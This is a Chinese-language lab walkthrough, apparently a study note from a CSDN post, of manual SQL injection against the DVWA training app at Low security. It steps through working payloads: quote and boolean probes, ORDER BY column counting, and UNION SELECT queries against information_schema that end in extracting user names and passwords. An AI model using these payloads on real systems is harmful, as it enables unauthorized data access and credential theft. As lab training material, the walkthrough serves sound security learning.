1、输入 1' 报错,判断有注入点,并且显示mysql数据库
2、输入1 and 1=1 能正常输出结果
再输入1 and 1=2 也能正常输出结果
判断不是数值型输入(如果是数值型输入,那么1=2应该不会显示出来)
3、输入1' and '1'='1 能正常输出
输入1' and '1'='2 不能正常输出
输入1"and "1"="1 也能正常输出
输入1"and "1"="2 也能正常输出
判断出来,是单引号的字符注入。
4、开始通过order by 判断有多少字段数
输入 1’ order by 1 能正常输出
输入 1’ order by 2 能正常输出
输入 1’ order by 3 报错 判断字段数只有2
5、开始使用联合查询数据库名
1' union select 1,database() # (#用于注释掉后面的符号)
得到数据库名为dvwa
6、再查找dvwa数据库中的所有表名
1' union select 1,table_name from information_schema.tables where table_schema='dvwa' #
(information_schema数据库中tables用于存放数据库所有的表)
得出来有两个表,一个是guestbook,一个是users;
7、再查看users表的所有列
1' union select 1,column_name from information_schema.columns where table_schema = 'dvwa' and table_name='users' #
(information_schema数据库中columns用于存放数据库所有的列 )
的出来有列user_name和password
8、最后找到对应用户姓名和密码
1' union select user , password from dvwa.users #
学习帖子:网络安全-靶机dvwa之sql注入Low到High详解(含代码分析)_在dvwa平台中完成一次sql注入,安全等级为初级。-CSDN博客